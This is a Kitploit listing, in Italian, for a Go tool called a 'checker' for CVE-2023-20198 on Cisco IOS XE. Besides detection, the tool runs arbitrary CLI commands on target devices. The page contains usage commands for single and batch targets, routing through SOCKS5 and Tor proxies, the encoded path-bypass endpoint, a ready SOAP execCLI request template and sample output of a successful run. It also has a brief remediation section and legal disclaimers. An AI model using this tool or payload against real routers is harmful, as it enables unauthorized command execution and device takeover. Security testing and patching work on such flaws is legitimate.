Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cisco-cve-2023-20198-checker — Scanner di vulnerabilità basato su Go per il rilevamento di CVE-2023-20198 su dispositivi Cisco IOS XE. Testa le interfacce SOAP/XML (WSMA) per esecuzione di codice remoto con scansione batch e generazione di report HTML. | Kitploit
Strumenti/GitHubGitHub/gustavorobertux/cisco-cve-2023-20198-checker
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza di RetePenetration TestingCommand and Control
GitHubgustavorobertux/cisco-cve-2023-20198-checker

cisco-cve-2023-20198-checker

Scanner di vulnerabilità basato su Go per il rilevamento di CVE-2023-20198 su dispositivi Cisco IOS XE. Testa le interfacce SOAP/XML (WSMA) per esecuzione di codice remoto con scansione batch e generazione di report HTML.

Vedi Repository
36 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Cisco CVE-2023-20198 Checker

Go Version License Platform

Scanner professionale di vulnerabilità per il rilevamento di CVE-2023-20198 sui dispositivi Cisco IOS XE. Verifica le interfacce SOAP/XML vulnerabili (WSMA). Progettato per valutazioni di sicurezza autorizzate e audit di rete.

⚠️ Avvertenze legali

SOLO PER TEST DI SICUREZZA AUTORIZZATI

Questo strumento è destinato esclusivamente a:

  • Scansione autorizzata di vulnerabilità
  • Audit di sicurezza con consenso scritto esplicito
  • Valutazioni di sicurezza della rete
  • Scopi didattici in ambienti di laboratorio controllati
  • Test di conformità e penetrazione

L'accesso non autorizzato ai sistemi informatici è ILLEGALE. Assicurati sempre di avere la dovuta autorizzazione prima di testare qualsiasi sistema.


🚀 Avvio rapido

Installazione

Usando go install (consigliato)

root@kitploit:~
go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest

Il binario verrà installato nella directory $GOPATH/bin (di solito ~/go/bin).

Installazione manuale

root@kitploit:~
# Clona il repository
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker

# Compila
go build -o cisco-cve-2023-20198-checker

# Installa (opzionale)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/

Utilizzo base

root@kitploit:~
# Verifica un singolo target
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# Verifica più target
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin

# Genera report HTML
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html

📋 Funzionalità

  • ✅ Rilevamento vulnerabilità - Verifica la presenza di CVE-2023-20198 (WSMA RCE)
  • ✅ Scansione singola e batch di target
  • ✅ Supporto porta personalizzata (default: 443)
  • ✅ Esecuzione comandi tramite SOAP/XML
  • ✅ Generazione report HTML professionali
  • ✅ Zero dipendenze esterne
  • ✅ Multipiattaforma (Linux, macOS, Windows)
  • ✅ Opzione per saltare la verifica SSL/TLS
  • ✅ Timeout configurabili
  • ✅ Supporto proxy (HTTP, HTTPS, SOCKS5)
  • ✅ Proxy autenticati
  • ✅ Supporto variabili d'ambiente (HTTP_PROXY, HTTPS_PROXY)

🌐 Supporto proxy

Perfetto per ambienti aziendali! Supporta:

  • Proxy HTTP/HTTPS
  • Proxy SOCKS5 (tunnel SSH, Tor)
  • Proxy autenticati
  • Variabili d'ambiente
root@kitploit:~
# Proxy HTTP
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# SOCKS5 (tunnel SSH)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# Variabile d'ambiente
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin

Vedi PROXY_GUIDE.md per la configurazione dettagliata del proxy.


💻 Opzioni da riga di comando

FlagTipoDefaultDescrizione
-targetstringa-IP/hostname del singolo target
-targets-filestringa-File con i target (uno per riga)
-portintero443Porta HTTPS/SOAP
-usernamestringaadminNome utente SOAP
-passwordstringa-Obbligatoria. Password SOAP
-commandstringauname -aComando da eseguire
-htmlbooleanofalseGenera report HTML
-timeoutintero10Timeout richiesta (secondi)
-skip-verifybooleanotrueSalta verifica SSL
-proxystringa-URL proxy (http://, https://, socks5://)

📖 Esempi di utilizzo

Test su singolo target

root@kitploit:~
# Verifica vulnerabilità di base
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# Porta personalizzata
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret

# Esegue un comando specifico
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# Genera report
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html

Test batch

root@kitploit:~
# Crea file dei target
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF

# Testa tutti i target
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123

# Batch con report HTML
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html

Comandi avanzati

root@kitploit:~
# Enumerazione di rete
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show ip interface brief"

# Rilevamento versione
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# Tramite proxy HTTP
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# Tramite proxy SOCKS5 (tunnel SSH)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# Proxy autenticato
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://user:[email protected]:8080

🔧 Informazioni su CVE-2023-20198

Dettagli della vulnerabilità

CVE ID: CVE-2023-20198
Punteggio CVSS: 10.0 (Critico)
Tipo: Esecuzione di codice remoto (RCE)
Affetti: Cisco IOS XE Web UI (WSMA)

Dettagli tecnici

  • Endpoint: /%2577ebui_wsma_https (bypass codifica percorso)
  • Protocollo: SOAP 1.1 su HTTPS
  • Autenticazione: WS-Security UsernameToken (credenziali valide richieste)
  • Namespace: urn:cisco:wsma-exec
  • Impatto: Compromissione completa del dispositivo con credenziali valide

Struttura della richiesta SOAP

root@kitploit:~
<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP:Header>
        <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
            <wsse:UsernameToken>
                <wsse:Username>admin</wsse:Username>
                <wsse:Password>password</wsse:Password>
            </wsse:UsernameToken>
        </wsse:Security>
    </SOAP:Header>
    <SOAP:Body>
        <request xmlns="urn:cisco:wsma-exec">
            <execCLI>
                <cmd>COMMAND_HERE</cmd>
            </execCLI>
        </request>
    </SOAP:Body>
</SOAP:Envelope>

🛡️ Rimedi

Per amministratori di sistema

Se i tuoi dispositivi sono vulnerabili:

1. Disabilita WSMA (se non necessario)

root@kitploit:~
no ip http server
no ip http secure-server

2. Limita l'accesso con ACL

root@kitploit:~
ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
  permit 10.0.0.0 0.0.0.255
  deny any log

3. Aggiorna il firmware - Applica le ultime patch di sicurezza Cisco

4. Abilita autenticazione forte

root@kitploit:~
aaa new-model
aaa authentication login default group tacacs+ local

5. Monitora i log - Controlla attività SOAP/HTTP sospette


🏗️ Compilazione dal sorgente

Prerequisiti

  • Go 1.21 o superiore

Compilazione

root@kitploit:~
# Compilazione standard
go build -o cisco-cve-2023-20198-checker

# Ottimizzata (binario più piccolo)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker

# Cross-compilazione per diverse piattaforme
GOOS=linux GOARCH=amd64 go build -o cisco-cve-2023-20198-checker-linux
GOOS=windows GOARCH=amd64 go build -o cisco-cve-2023-20198-checker.exe
GOOS=darwin GOARCH=arm64 go build -o cisco-cve-2023-20198-checker-mac-m1

📊 Esempi di output

Output terminale

root@kitploit:~
╔═══════════════════════════════════════════════════════════╗
║     Controllo sicurezza SOAP/XML Cisco                     ║
║     Solo valutazione di sicurezza autorizzata e didattica ║
╚═══════════════════════════════════════════════════════════╝

[*] Comando: show version
[*] Porta: 443
[*] Timeout: 10 secondi

[1/1] Test target: 192.168.1.100:443
[*] Invio richiesta SOAP...
[+] Risposta ricevuta (Stato: 200)
[+] Successo!

╔═══════════════════════════════════════════════════════════╗
║                    RISULTATI BATCH                          ║
╚═══════════════════════════════════════════════════════════╝

[✓] 192.168.1.100:443 - SUCCESSO
Cisco IOS XE Software, Versione 16.09.04...

╔═══════════════════════════════════════════════════════════╗
║                      SOMMARIO                              ║
╚═══════════════════════════════════════════════════════════╝
Target totali: 1
Riusciti: 1
Falliti: 0

Report HTML

Report professionale di valutazione della sicurezza con:

  • Dashboard statistiche
  • Configurazione dettagliata
  • Output dei comandi (stile terminale)
  • Metadati tecnici
  • Avvertenze legali

🤝 Contributi

I contributi sono benvenuti! Per favore:

  1. Fai un fork del repository
  2. Crea un branch per la funzionalità
  3. Apporta le tue modifiche
  4. Invia una pull request

📝 Licenza

Licenza MIT - vedi file LICENSE


🔗 Riferimenti

  • Avviso di sicurezza Cisco
  • Dettagli CVE-2023-20198
  • Sicurezza API OWASP

⚖️ Divulgazione responsabile

Questo strumento è destinato esclusivamente alla scansione autorizzata delle vulnerabilità. Gli autori non sono responsabili per un uso improprio. Ottieni sempre un'autorizzazione scritta prima di testare sistemi che non possiedi.


Realizzato per la comunità della sicurezza 🛡️

Scarica lo strumento